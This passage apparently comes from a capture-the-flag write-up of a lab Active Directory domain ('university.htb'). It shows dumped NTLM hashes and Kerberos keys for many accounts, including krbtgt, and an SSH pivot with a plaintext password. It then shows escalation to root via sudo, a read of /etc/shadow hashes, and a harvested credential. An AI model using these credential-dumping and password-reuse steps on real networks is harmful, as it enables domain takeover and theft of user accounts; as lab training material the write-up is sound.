karma.watterson:1108:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Alice.Z:1109:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Steven.P\Steven.P:1110:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Karol.J\Karol.J:1111:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Leon.K\Leon.K:1112:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Anna.C\A.Crouz:1113:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kai.K\Kai.K:1114:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Arnold.G\Arnold.G:1115:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Kareem.A\Kareem.A:1116:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Lisa.K\Lisa.K:1117:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Jakke.C\Jakken.C:1118:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Nya.R\Nya.R:1119:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Brose.W\Brose.W:1120:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Choco.L\Choco.L:1121:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Rose.L\Rose.L:1122:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Emma.H\Emma.H:1123:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
C.Freez\C.Freez:1124:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
Martin.T\Martin.T:1127:aad3b435b51404eeaad3b435b51404ee:ba76a28db8aaeb636566a414f3e104aa:::
William.B\William.B:1132:aad3b435b51404eeaad3b435b51404ee:a910f374f7e63717f112fb4e40122a7c:::
uwu:10603:aad3b435b51404eeaad3b435b51404ee:b490b475e987909ae9bd83a65aa94665:::
DC$:1000:aad3b435b51404eeaad3b435b51404ee:2522eb84c83b5e9ffde18045be5b9e59:::
WS-3$:1134:aad3b435b51404eeaad3b435b51404ee:b51c7661e82feb147afffb324d91af34:::
GMSA-PClient01$:1140:aad3b435b51404eeaad3b435b51404ee:e5799ed7c404dead98cbe2fc610b9b1f:::
WS-1$:1141:aad3b435b51404eeaad3b435b51404ee:c23b84b12d7f2c758e4ca7da5b053c81:::
WS-2$:1142:aad3b435b51404eeaad3b435b51404ee:bfd5d3a7883cb6e0a63a29d0cdfd430c:::
WS-4$:1143:aad3b435b51404eeaad3b435b51404ee:c591cf4bcad09cc0eb5ba2b54e58b217:::
WS-5$:1144:aad3b435b51404eeaad3b435b51404ee:7427ac9458a4a39f5076ab080b1329b3:::
LAB-2$:1145:aad3b435b51404eeaad3b435b51404ee:93b3bf5940c921c6f072961d10c3f43f:::
[*] Kerberos keys grabbed
Administrator:aes256-cts-hmac-sha1-96:57165230d0d19617ca0963b38799c474dead2e2e0ecab979b3112686a51820d3
Administrator:aes128-cts-hmac-sha1-96:7ff72d9d3f65a3efa1fdae60fbb0d5f3
Administrator:des-cbc-md5:f2f17f2c16463886
krbtgt:aes256-cts-hmac-sha1-96:52ce53d2030dd2687b36bec21c329f04b74938dc1e7793a93c4c9980835c7ef3
krbtgt:aes128-cts-hmac-sha1-96:79cdade7f3d4cfc5398ff6f82f4335ae
krbtgt:des-cbc-md5:fb7fae5ece8f9879
university.htb\John.D:aes256-cts-hmac-sha1-96:21dd09fe9814cab35b8cbc0f8195fb3d1264fd547317939e6a130ce3eb6b4511
university.htb\John.D:aes128-cts-hmac-sha1-96:10b1a2d48d658e4b1105e86e83f756dc
university.htb\John.D:des-cbc-md5:5bae86cdead37531
university.htb\George.A:aes256-cts-hmac-sha1-96:f6eb3c5bf98fdfb635b3c6da6ae98dc891e1ce3780d2e2ec2651c7f4eb983a40
university.htb\George.A:aes128-cts-hmac-sha1-96:6de8f3cdec17069761798c9029869298
university.htb\George.A:des-cbc-md5:29f7fedca13eb51a
WAO:aes256-cts-hmac-sha1-96:048f13833165f244e42d3c504243b93299b89ae3cd3f77f1e44072295977f8dc
WAO:aes128-cts-hmac-sha1-96:dae044fa1a5127dc73c1227cce87138e
WAO:des-cbc-md5:3b0b7fe99e0dd029
university.htb\hana:aes256-cts-hmac-sha1-96:e6672076fc6ff185b3b5b16b7748e1c2d79b082acc0e131005951a77b11a4183
university.htb\hana:aes128-cts-hmac-sha1-96:3ee719263aae39bc92fbb09bef9eee00
university.htb\hana:des-cbc-md5:bfec899213df4651
karma.watterson:aes256-cts-hmac-sha1-96:691ee7af21e7a7658d4f481a11e3b782eee8a94bb0ccb346ef254849545a8ed4
karma.watterson:aes128-cts-hmac-sha1-96:79bd278f4872e5b069a85e4d449ef02f
karma.watterson:des-cbc-md5:f20837bc94f10dfe
Alice.Z:aes256-cts-hmac-sha1-96:d82c6840941ac7267c79a322b9c7caa24fe1fe656d2624aeba6f32623296525e
Alice.Z:aes128-cts-hmac-sha1-96:efd562ce518fd8aabba4d9d2edef346c
Alice.Z:des-cbc-md5:cd2549808f75343b
Steven.P\Steven.P:aes256-cts-hmac-sha1-96:5707911aa507f986eea4c1d5f87ccf79f0a9de45f4a36f940c8bbd898e5e41bb
Steven.P\Steven.P:aes128-cts-hmac-sha1-96:bba36f53925ccb71e21cdb383ed67a0b
Steven.P\Steven.P:des-cbc-md5:ae1c45a23289190b
Karol.J\Karol.J:aes256-cts-hmac-sha1-96:56103c4cf610a125a6a23823c209dcdbe199ade01f94da4d332b01068bd6a740
Karol.J\Karol.J:aes128-cts-hmac-sha1-96:c9a2f8992302e113938d7750026f901c
Karol.J\Karol.J:des-cbc-md5:68e331b6dc2ad98c
Leon.K\Leon.K:aes256-cts-hmac-sha1-96:1ece984548eb4eba3c523bd3d2328e902ce479fdfb727099380f68f5a0d2cb49
Leon.K\Leon.K:aes128-cts-hmac-sha1-96:848593e19936039550019f28444a3da0
Leon.K\Leon.K:des-cbc-md5:c851b58316c8ce25
Anna.C\A.Crouz:aes256-cts-hmac-sha1-96:14574495c3560a737b1762d55472c20b556077aa4794f9694cc28c59705a42fe
Anna.C\A.Crouz:aes128-cts-hmac-sha1-96:3f018e7682f353b16cc7b620a0ef2f8c
Anna.C\A.Crouz:des-cbc-md5:1aa8a2ce75700115
Kai.K\Kai.K:aes256-cts-hmac-sha1-96:438fb0fbb03ef035a5853f9495f62b761fe14016039249d042b6cfbe5f111390
Kai.K\Kai.K:aes128-cts-hmac-sha1-96:e2d4eae38d843778e3a14f87377b4d37
Kai.K\Kai.K:des-cbc-md5:589def32ba38cb16
Arnold.G\Arnold.G:aes256-cts-hmac-sha1-96:4399fe126980a15d35bf04c8fef4055f411c8c856e7f5225e16c46c07342f127
Arnold.G\Arnold.G:aes128-cts-hmac-sha1-96:c5053f4f0840bda9ad2f13ba63ccbbbf
Arnold.G\Arnold.G:des-cbc-md5:32297623943723e0
Kareem.A\Kareem.A:aes256-cts-hmac-sha1-96:d0b4d84027baa07382b6b7e1db90f492316f2e2ebf103034ef90430f08739d4c
Kareem.A\Kareem.A:aes128-cts-hmac-sha1-96:8d70f6949ea4870a7558a285c579fd67
Kareem.A\Kareem.A:des-cbc-md5:022f34d3764f37f2
Lisa.K\Lisa.K:aes256-cts-hmac-sha1-96:5e4f6bd9805046070c85445d9475e3bab9bb5d136483ef06871c585f57f15a52
Lisa.K\Lisa.K:aes128-cts-hmac-sha1-96:4c4d6872dd1eaba8743844570bd1d93d
Lisa.K\Lisa.K:des-cbc-md5:e3510225071f7abc
Jakke.C\Jakken.C:aes256-cts-hmac-sha1-96:4c8a5426d5dbd5ab2eeca3d75075df687126a61fc94253c8edbedfe61243a58a
Jakke.C\Jakken.C:aes128-cts-hmac-sha1-96:2008f8400116981ca13052818b8b015f
Jakke.C\Jakken.C:des-cbc-md5:3b08b343ba0eb0b6
Nya.R\Nya.R:aes256-cts-hmac-sha1-96:fa49f32f8bceda29f095bbce0f6b421e4b5b46f497b5c0613758ff46ed12e18e
Nya.R\Nya.R:aes128-cts-hmac-sha1-96:6578cef55b3cad6ba22e83886cdeab7e
Nya.R\Nya.R:des-cbc-md5:b994f4d910ae01c2
Brose.W\Brose.W:aes256-cts-hmac-sha1-96:1113b12ff5b32fbda629aa1d5b841dcd049302fac33f0f7420313d4ed572d900
Brose.W\Brose.W:aes128-cts-hmac-sha1-96:da6945c6a3f4faddcad139f07a79f4b2
Brose.W\Brose.W:des-cbc-md5:703b0294f87968c2
Choco.L\Choco.L:aes256-cts-hmac-sha1-96:80f15a8852e6fd430ae10e0fdd5c4e4b2adac39a2a6d3f990ad198f50634fc26
Choco.L\Choco.L:aes128-cts-hmac-sha1-96:18af98f4bbadbe494f0c562ff81f3d51
Choco.L\Choco.L:des-cbc-md5:c494253bd35289b0
Rose.L\Rose.L:aes256-cts-hmac-sha1-96:94296b923765c8a823d3f3cdfd08207bcb5db26354080c82bbbcf4fbcdcf3836
Rose.L\Rose.L:aes128-cts-hmac-sha1-96:aaddb9f3fa962b4b34f4c4a5356df925
Rose.L\Rose.L:des-cbc-md5:469b6713c4292a5b
Emma.H\Emma.H:aes256-cts-hmac-sha1-96:05ce732c932e48edd7328a5af7b949519ade7d231616cce6c61406cb9e00231c
Emma.H\Emma.H:aes128-cts-hmac-sha1-96:1ec8641fe93994c480aa780d91017104
Emma.H\Emma.H:des-cbc-md5:62bf26da3b0b0b58
C.Freez\C.Freez:aes256-cts-hmac-sha1-96:68ce938782346c294888702a8f5c804dd5ca5ad794ad5fd0b0ad91e303bc1e98
C.Freez\C.Freez:aes128-cts-hmac-sha1-96:a382a211f93529aecf18ee77a29ab859
C.Freez\C.Freez:des-cbc-md5:6454387a684545df
Martin.T\Martin.T:aes256-cts-hmac-sha1-96:aab6592eb571149292bdf548ecfbbb9132956ef8fdccee4cf6234ac76a0298e8
Martin.T\Martin.T:aes128-cts-hmac-sha1-96:ea989c266229d4aaf5dbaa4463e33747
Martin.T\Martin.T:des-cbc-md5:07d525d957201a15
William.B\William.B:aes256-cts-hmac-sha1-96:983519579faa3198d9530cac738836a56df853eb096dac33ce4aa88fc5a31e3e
William.B\William.B:aes128-cts-hmac-sha1-96:d133f6d4851b032289ec98a662acbd39
William.B\William.B:des-cbc-md5:0e5431b02a68b557
uwu:aes256-cts-hmac-sha1-96:a289dc00b3df7a6373de435e288fba8c840c0dd95fdacbe94c1fb49b5bd72c34
uwu:aes128-cts-hmac-sha1-96:0889d48115119bf3fa087a0956543b84
uwu:des-cbc-md5:91b657a71661349e
DC$:aes256-cts-hmac-sha1-96:1e28d41c5f05d6d11bb85093b1dd37796d526e747f51aa75ab4cad3f3c90bfe7
DC$:aes128-cts-hmac-sha1-96:dd4911edcf56d2626325632928d0f45c
DC$:des-cbc-md5:9b58ab8a892fa81c
WS-3$:aes256-cts-hmac-sha1-96:2f406f2fbc41fc6bdf08c7b49d048b145f595664ed770e33d1210c8ddeea43ed
WS-3$:aes128-cts-hmac-sha1-96:9536bafcc7f0f3eaa75666ce9dda4529
WS-3$:des-cbc-md5:dc2a76264abcfbfe
GMSA-PClient01$:aes256-cts-hmac-sha1-96:352cdbf0cd78625979044b7c084f4e2389b7ce574149908d6f7667bc9257dce8
GMSA-PClient01$:aes128-cts-hmac-sha1-96:dc67dee2694935710c5266115b41529d
GMSA-PClient01$:des-cbc-md5:a74f8a2cf7348083
WS-1$:aes256-cts-hmac-sha1-96:053d04f5d4bf72f11b17f4ef1f123da28587a24ae6d87006460ea721f53d5cf3
WS-1$:aes128-cts-hmac-sha1-96:2075e3e815e44ca3853d562c4a9c5453
WS-1$:des-cbc-md5:bad532a2a74f2a94
WS-2$:aes256-cts-hmac-sha1-96:45d320e28768dd31c13ccc4fc3186eb52104d480ad761d5cdc5bc54921a5d2c3
WS-2$:aes128-cts-hmac-sha1-96:f3a18ccdcadd1b0f9fa86720dc3730fe
WS-2$:des-cbc-md5:c1169115cb7c8c67
WS-4$:aes256-cts-hmac-sha1-96:57676ebc2adde9b1ad0c11126c330db1b561378f50b5298285d6120225ab7b2d
WS-4$:aes128-cts-hmac-sha1-96:fb811618c2a0938d27c45a64e78ca131
WS-4$:des-cbc-md5:dc4cb962e9252f2a
WS-5$:aes256-cts-hmac-sha1-96:efcc09c0abf92483eaa0cc85b7fbb200abcac40050ce34e92c433d2d40315871
WS-5$:aes128-cts-hmac-sha1-96:2e1145b05af8761e092c724435424044
WS-5$:des-cbc-md5:08c8c49d3e2c5ee9
LAB-2$:aes256-cts-hmac-sha1-96:053aa90f8888c1fbafa79d6e1eab4a8f1e9d8c93a3cc3e6977a37e475a0969cb
LAB-2$:aes128-cts-hmac-sha1-96:630cd5f5d00deb7f1cf8750c9e7028db
LAB-2$:des-cbc-md5:3815c8df0e231cf4
[*] Cleaning up...
[*] Stopping service RemoteRegistry
[-] SCMR SessionError: code: 0x41b - ERROR_DEPENDENT_SERVICES_RUNNING - A stop control has been sent to a service that other running services are dependent on.
[*] Cleaning up...
[*] Stopping service RemoteRegistry

SSH

There's also some other machine, let's inspect it.

└─$ proxychains -q ssh wao@LAB-2.university.htb
--------------------------[!]WARNING[!]-----------------------------
|This LAB is created for web app features testing purposes ONLY....|
|Please DO NOT leave any critical information while this machine is|
|       accessible by all the "Web Developers" as sudo users       |
--------------------------------------------------------------------
wao@lab-2.university.htbs password: WebAO1337
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-213-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/pro
Last login: Mon Oct 21 17:11:58 2024 from 192.168.99.1
wao@LAB-2:~$ id
uid=1001(wao) gid=1001(wao) groups=1001(wao),27(sudo)
wao@LAB-2:~$ sudo -l
[sudo] password for wao: WebAO1337
Matching Defaults entries for wao on LAB-2:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User wao may run the following commands on LAB-2:
    (ALL : ALL) ALL
wao@LAB-2:~$ sudo su
root@LAB-2:/home/wao/Downloads# ls -Alh
total 52K
drwxrwxr-x 2 wao wao 4.0K Sep 14 03:55 CA
drwxrwxr-x 2 wao wao 4.0K Sep 14 03:55 gunicorn-test
drwxrwxr-x 2 wao wao 4.0K Sep 14 03:55 nginx
-rwxrwxr-x 1 wao wao  23K Sep 14 03:55 proto-features.py
drwxrwxr-x 2 wao wao 4.0K Sep 14 03:55 test
drwxrwxr-x 3 wao wao 4.0K Sep 14 03:55 University-Linux
drwxrwxr-x 5 wao wao 4.0K Sep 14 03:55 University-Prototype-23
drwxrwxr-x 3 wao wao 4.0K Sep 14 03:55 University-Windows

Hashes are most probably not crackable....

root@LAB-2:/home/wao# cat /etc/shadow | grep '\$6\$'
root:$6$n5REEVlM$nYgdHK6CtQp3vbyZw2.lMaeUANVM75JmlRncD6qnObUetFP8SG2cc8XW/1enA1oUxXS39H17Cz8./En8sNQNe.:19979:0:99999:7:::
wao:$6$ZENNwHYt$DhiPYWPPBP/2sxfUusrx/5x6.8b5qI4gdJde9NDbV.8kTtxTdxvEW5rb5wG9qudc82aX01AOILA2iNoZYEilE/:19982:0:99999:7:::
steven:$6$W14mH6Yy$.qJ3F3FwQ5oVgBiYdCLBSQn8v.SbJ3MDEoTZ/0OhpamOhUKH/hgTZOyuoxcZpwiGtqLYy5PTz1zL6GY7vWGF8/:19979:0:99999:7:::
emma:$6$2gWMCP4b$pzjWdquZSg80UdO2RylTycDchjgdlznxGHhGdKafgyaUgjVVLwsgjbirtNkIzvDCBk5ixquxiba0IFwX6bsa9.:19980:0:99999:7:::

Some credentials were left in settings.py:

Writeup-11.png

Creds: WAO:W3lc0meT0TheH3ll!

Password doesn't work for any linux user, nor for DC via netexec smb enum.